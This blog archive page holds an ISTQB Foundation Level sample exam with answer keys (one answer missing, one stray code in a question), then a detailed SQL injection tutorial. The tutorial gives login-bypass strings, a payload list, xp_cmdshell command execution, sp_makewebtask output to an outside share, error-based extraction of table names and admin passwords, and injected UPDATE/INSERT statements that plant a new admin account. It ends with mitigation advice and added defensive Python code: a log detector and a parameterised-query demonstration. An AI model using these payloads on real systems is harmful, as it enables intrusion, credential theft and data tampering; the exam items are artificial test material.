Tuesday, December 27, 2011

ISTQB ISEB Foundation Level Sample Paper

1. Which of the following are the typical defects found by static analysis tools?
a. Variables that are never used.
b. Security vulnerabilities.
c. Poor performance.
d. Unreachable code.
e. Business processes not followed.
A. b, c and d are true; a and e are false
B. a is true; b, c, d and e are false
C. c, d and e are true; a and b are false
D. a, b and d are true; c and e are false
Answer: D



2. Which of the following are characteristics of good testing in any life cycle model?
a. Every development activity has a corresponding test activity.
b. Testers review development documents early.
c. There are separate levels for component and system integration test.
d. Each test level has objectives specific to that level.
e. Each test level is based on the same test basis.
A. a, d and e
B. b, c and e
C. a, c and d
D. a, b and d
Answer: D



3. Which of the following statements are true in relation to component testing?
a. Stubs may be used.
b. May cover resource behaviour (e.g. memory leaks).
c. Tests the interactions between software components.
d. Defects are typically fixed without formally managing these defects.
A. a, c and d
B. a, b and d
C. b, c and d
D. a, b and c
Answer: B



4. A system specification states that a particular field should accept alphabetical characters in either upper or lower case. Which of the following test cases is from an INVALID equivalence partition?
A. Feeds
B. F33ds
C. FEEDS
D. fEEDs
Answer: B


5. Which of the following statements is GENERALLY true of testing?
a. Testing can show the presence of defects.
b. Testing reduces the probability of uncovered defects.
c. Testing can show that a previously present defect has been removed.
d. Testing can prove that software is defect free.
A. a, b and c
B. a, b and d
C. a, c and d
D. b, c and d
Answer: A



6. Which ADDITIONAL test level could be introduced into a standard V-model after system testing?
A. System Integration Testing
B. Acceptance Testing
C. Regression Testing
D. Component Integration Testing
Answer: A


7. Which statement BEST describes the role of testing?
A. Testing ensures that the right version of code is delivered
B. Testing can be used to assess quality.
C. Testing shows that the software is error free.
D. Testing improves quality in itself.
Answer: B



8. Which tasks would USUALLY be performed by a test leader and which by the tester?
a. Adapt planning based on test results.
b. Create test specifications.
c. Plan tests.
d. Write or review a test strategy.
A. c and d by the test leader; a and b by the tester.
B. a and b by the test leader; c and d by the tester.
C. a and d by the test leader; b and c by the tester.
D. a, c and d by the test leader; b by the tester.
Answer: D



9. When in the lifecycle should testing activities start?
A. As early as possible
B. After the test environment is ready
C. After the requirements have been reviewed
D. Once the code is available to test
Answer: A


10. Which one of the following is a characteristic of good testing in any lifecycle model?
A. Each test level has the same test objective.
B. There should be more testing activities than development activities.
C. Test design can only begin when development is complete.
D. Testers should begin to review documents as soon as drafts are available.
Answer: D


11. During which activity of the Fundamental Test Process do you review the test basis?
A. Evaluating exit criteria and reporting.
B. Test implementation and execution
C. Test analysis and design
D. Test planning and control
Answer: C


12. Which one of the following statements about approaches to test estimation is true?
A. A metrics-based approach is based on data gathered from previous projects; an expert-based approach uses the knowledge of the owner of the tasks or experts
B. A metrics-based approach is based on creating a work-breakdown structure first; an expert-based approach is based on input from estimation experts
C. A metrics-based approach is based on data gathered from previous projects; an expert-based approach is based on a work-breakdown structure
D. A metrics-based approach is based on an analysis of the specification documents; an expert-based approach is based on the opinion of the most experienced tester in the organization
Answer: A


13. Which ordering of the list below gives increasing levels of test independence?
a. Tests designed by a fellow-member of the design team.
b. Tests designed by a different group within the organization.
c. Tests designed by the code author.
d. Tests designed by different organization.
A. c, a, b, d.
B. d, b, a, c.
C. c, a, d, b.
D. a, c, d, b.
Answer: A


14. Which of the following are structure-based techniques?
a. Decision table testing
b. Boundary value analysis
c. Multiple condition coverage
d. Use case testing
e. Decision testing
A. a and c.
B. b and d.
C. b and e.
D. c and e.
Answer: D


15. Pair the correct test design techniques (i to v) with the category of techniques (x, y and z):
i) Exploratory Testing
ii) Equivalence Partitioning
iii) Decision Testing
iv) Use Case Testing
v) Condition coverage
x) Specification-based
y) Structure-based
z) Experienced-based
A. x = i and ii; y = iii and v; z = iv.
B. x = i, ii and iv; y = v; z = iii
C. x = ii and iv; y = iii and v; z = i.
D. x = iii and iv; y = v; z = i and ii.


16. Which of the following is a MAJOR task of evaluating exit criteria and reporting?
A. Writing a test summary report for stakeholders
B. Logging the outcome of test execution
C. Repeating test activities as a result of action taken for each discrepancy.
D. Evaluating testability of the requirements and system
Answer: A


17. The digital Rainbow Thermometer uses 7 colours to show the ambient temperature. Each colour spans a range of just 5°, with an operating minimum and maximum of minus 5° and 30°. Which of the following values is LEAST likely to have been identified when applying the boundary value test design technique?
A. 30°
B. 0°
C. 8°
D. 15°
Answer: C



18. In which activity of the Fundamental Test Process is the test environment set up?
A. Test implementation and execution.
B. Test planning and control
C. Test analysis and design
D. Evaluating exit criteria and reporting
Answer: A


19. Which of the following statements about black box and white box techniques is correct?
A. Decision Testing, Equivalence Partitioning and Condition Coverage are all black box techniques
B. Decision Table Testing, State Transition and Use Case Testing are all black box techniques
C. Decision Testing, Equivalence Partitioning and Statement Testing are all white box techniques
D. Boundary Value Analysis, State Transition and Statement Testing are all white box techniques
Answer: B


20. Which of the following are characteristic of test management tools?
a) They support traceability of tests to source documents.
b) They provide an interface to test execution tools.
c) They help to enforce coding standards.
d) They manipulate databases and files to set up test data.
A. a and c
B. b and c
C. a and b
D. b and d
Answer: C


21. How is the scope of maintenance testing assessed?
A. Scope is related to the risk, size of the changes and size of the system under test
B. Scope is defined by the size and type of system being changed
C. Scope is defined by the size and type of system being changed
D. Scope is related to the number of system users affected by the change.
Answer: A



22. A system under development contains complex calculations and decision logic, and it is assessed as high risk because of the relative inexperience of the development team in the application domain. Which of the following would be the MOST appropriate choice of test design technique for component testing?
A. Decision testing.
B. Statement testing
C. State transition testing
D. Equivalence partitioning
Answer: A


23. Which of the following is an example of a product risk?
A. Software that does not perform its intended functions
B. Failure of a third party
C. Problems in defining the right requirements
BH0-010
D. Skill and staff shortages
Answer: A


24. Given the following sample of pseudo code:
01 Input number of male tigers
02 Input number of female tigers
03 If male tiger > 0 and female tiger > 0 then
04 Input "Do you want to breed (Yes / No)"
05 If breed = "No"
06 Print "Keep male and female tigers apart"
07 End if
08 End If
Which of the following test cases will ensure that statement 6 is executed?
A. male tiger = 1, female tiger = 1, breed = yes
B. male tiger = 1, female tiger = 1, breed = no
C. male tiger = 1, female tiger = 2, breed = yes
D. male tiger = 1, female tiger = 0, breed = no
Answer: B



25. Which of the following BEST describes a data-driven approach to the use of test execution tools?
A. Monitoring response times when the system contains a specified amount of data
B. Manipulation of databases and files to create test data
C. Using a generic script that reads test input data from a file
D. Recording test scripts and playing them back
Answer: C



26. Which statement about combinations of inputs and preconditions is true for a large system?
A. It is easy to test them all in a short time
B. It is not practically possible to test them all
C. It is not possible to test any of them
D. It is essential to test them all in order to do good testing
Answer: B


28. Which of the following is a purpose of the review kick off activity?
A. Explain the objectives
B. Select the personnel group
C. Document results
D. Define entry and exit criteria
Answer: A


29. Which one of the following is true of software development models?
A. There are always four test levels in the V-model.
B. In a Rapid Application Development (RAD) project, there are four test levels for each iteration.
C. In Agile development models, the number of test levels for an iteration can vary depending on the project.
D. There must be at least four test levels for any software development model.
Answer: C



30. Which of the following activities should be performed during the selection and implementation of a testing tool?
a) Determine whether the organization's existing test process needs to change.
b) Conduct a proof of concept.
c) Implement the selected tool on a project behind schedule to save time.
d) Identify coaching and mentoring requirements for the use of the selected tool
A. a, b and c.
B. b, c and d.
C. a, c and d.
D. a, b and d.
Answer: D


31. The following code segment contains a potential "divide by 0" error.
J = 50
K = 1
while (N >= -10) and (N <= 10) loop
    M[K] = J / N
    K = K + 1
    N = N - 1
end loop;
Which of the following is the most effective way of detecting this error?
A. Boundary testing
B. Condition testing
C. Compilation of the source code
D. Source code inspection
Answer: D


32. A test team consistently finds between 90% and 95% of the defects present in the system under test. While the test manager understands that this is a good defect-detection percentage for her test team and industry, senior management and executives remain disappointed in the test group, saying that the test team misses too many bugs. Given that the users are generally happy with the system and that the failures which have occurred have generally been low impact, which of the following testing principles is most likely to help the test manager explain to these managers and executives why some defects are likely to be missed?
A. Exhaustive testing is impossible
B. Defect clustering
C. Pesticide paradox
D. Absence-of-errors fallacy
Answer: A


33. System test execution on a project is planned for eight weeks. After a week of testing, a tester suggests that the test objective stated in the test plan of 'finding as many defects as possible during system test' might be more closely met by redirecting the test effort according to which test principle?
A. Impossibility of exhaustive testing.
B. Importance of early testing.
C. The absence of errors fallacy.
D. Defect clustering.
Answer: D



34. Which of the following statements is MOST OFTEN true?
A. Source-code inspections are often used in component testing.
B. Component testing searches for defects in programs that are separately testable.
C. Component testing is an important part of user acceptance testing.
D. Component testing aims to expose problems in the interactions between software and hardware components.
Answer: B

Wednesday, November 23, 2011

SQL Injections

1 What is SQL Injection?
It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take, for instance, a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

2 What do you need?
Any web browser.

3 What you should look for?
Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:


Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit wise).


4 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:

http://duck/index.asp?id=10

5 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

into the login field, the password field, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it to your hard disk, and modify the URL and hidden field accordingly. Example:



If luck is on your side, you will be logged in without any login name or password.

6 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name and 'food' is the value assigned to the variable. To do that, the ASP page might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our value will be wrapped into v_cat and thus the SQL statement becomes:

SELECT * FROM product WHERE PCategory='food'

The query should return a result set containing one or more rows that match the WHERE condition, in this case 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now our variable v_cat equals "food' or 1=1-- "; if we substitute this into the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the trailing single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#".

However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

7 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets from 10.10.1.2 and check whether there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server and get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.

8 How to get output of my SQL query?
It is possible to use sp_makewebtask to write the output of your query into an HTML file:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have a folder "share" shared for Everyone.

9 How to get data from the database using ODBC error message
We can use information from the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information about all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert the string (nvarchar) to an integer. This will produce an error, since nvarchar cannot be converted to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for data using the LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern '%25login%25' will be seen as %login% by SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

10 How to mine all column names of a table?
We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know we have reached the end when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

11 How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

12 How to get numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let us say we are trying to get the password of "trinity", which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with the integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b). We will append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function to convert '31173 morpheus' into an integer, SQL Server will throw out an ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

13 How to update/insert data into the database?
Once we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".
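The enumeration described in sections 9 to 13 is driven entirely from the query string, so every step leaves a recognisable trail in the web server's access log. The following is an added example, not from the original post, of a small detector that URL-decodes each request target once (as the web server does, so that %25login%25 becomes %login% and %27 becomes a quote) before matching it against the payload shapes shown above. The log lines, the indicator list and the function names are constructed for this example; they are not exhaustive, and the last sample line shows a harmless "union" that must not be flagged.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns derived from the payload shapes shown on this page
# (constructed for this example; they are illustrative, not exhaustive).
INDICATORS = [
    r"\bunion\s+(?:all\s+)?select\b",
    r"information_schema\.(?:tables|columns)",
    r"xp_cmdshell",
    r"sp_makewebtask",
    r"'\s*or\s*1\s*=\s*1",
    r"'\s*or\s*'a'\s*=\s*'a",
]
INDICATOR_RE = re.compile("|".join(INDICATORS), re.IGNORECASE)

# Constructed access-log lines: client address, method, request target.
SAMPLE_LOG = """\
10.0.0.5 GET /index.asp?id=10
10.0.0.9 GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES--
10.0.0.9 GET /index.asp?category=food%27%20or%201%3D1--
10.0.0.5 GET /index.asp?category=food
10.0.0.9 GET /index.asp?id=10;%20exec%20master..xp_cmdshell%20%27ping%2010.10.1.2%27--
10.0.0.5 GET /search.asp?q=union+station
"""


def decode_request(target):
    """Decode the request target once, as the web server would, so that
    %27 becomes ', %2b becomes + and %25login%25 becomes %login%."""
    return unquote_plus(target)


def flag_requests(log_text):
    """Return (client, matched indicator, decoded target) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash on them
        client, _method, target = parts
        decoded = decode_request(target)
        match = INDICATOR_RE.search(decoded)
        if match:
            hits.append((client, match.group(0), decoded))
    return hits


if __name__ == "__main__":
    for client, indicator, target in flag_requests(SAMPLE_LOG):
        print(f"{client} matched {indicator!r} in {target}")
```

Matching on the decoded target is the important design choice: the encoded forms the page uses (%25, %2b, %27) would otherwise slip past a pattern written for the plain text. Because the indicators are plain regular expressions, they are a starting point for alerting, not a substitute for fixing the query code itself.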

14 How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies

For numeric values, convert them to an integer before putting them into the SQL statement, or use ISNUMERIC to make sure the value is a number.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using, such as:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
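As an added example that is not part of the original post, here is the vulnerable ASP pattern from section 6 rebuilt in Python beside the hardened form that section 14 calls for. The same "food' or 1=1--" input is run against a string-concatenated query and against a parameterised one, and the numeric id check is done with int() before the value gets anywhere near SQL. An in-memory SQLite database with a constructed product table stands in for the page's MS SQL table; the rows, the function names and the use of SQLite are assumptions made for this example.

```python
import sqlite3

# Constructed sample rows standing in for the page's "product" table.
SAMPLE_PRODUCTS = [
    (1, "apple", "food"),
    (2, "bread", "food"),
    (3, "hammer", "tools"),
    (4, "wrench", "tools"),
]


def make_db():
    """Build an in-memory SQLite database holding the sample product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def vulnerable_lookup(conn, v_cat):
    """Mirror of the ASP snippet in section 6: the request value is glued into
    the SQL text, so a quote in it ends the literal and the rest becomes SQL."""
    sqlstr = "SELECT name FROM product WHERE PCategory='" + v_cat + "'"
    return sorted(row[0] for row in conn.execute(sqlstr))


def safe_lookup(conn, v_cat):
    """Hardened form: a parameterised query. The driver passes v_cat as data,
    so the quote and the '--' are just characters inside a category name."""
    sqlstr = "SELECT name FROM product WHERE PCategory=?"
    return sorted(row[0] for row in conn.execute(sqlstr, (v_cat,)))


def safe_lookup_by_id(conn, raw_id):
    """Section 14's advice for numeric fields: convert to an integer first.
    A value such as '10 UNION SELECT ...' fails int() and never reaches SQL."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return None  # reject the request instead of querying
    rows = conn.execute("SELECT name FROM product WHERE id=?", (product_id,))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    for probe in ("food", "food' or 1=1--", "' or 'a'='a"):
        print(repr(probe), "concatenated:", vulnerable_lookup(db, probe),
              "parameterised:", safe_lookup(db, probe))
    print(safe_lookup_by_id(db, "3"), safe_lookup_by_id(db, "10 UNION SELECT 1--"))
```

Run as a script, the concatenated query returns every row for the injected inputs while the parameterised query returns none, because no category is literally named "food' or 1=1--". This is why placeholders are preferable to character filtering: the filter in section 14 has to anticipate every quoting trick, whereas a parameter is never parsed as SQL at all.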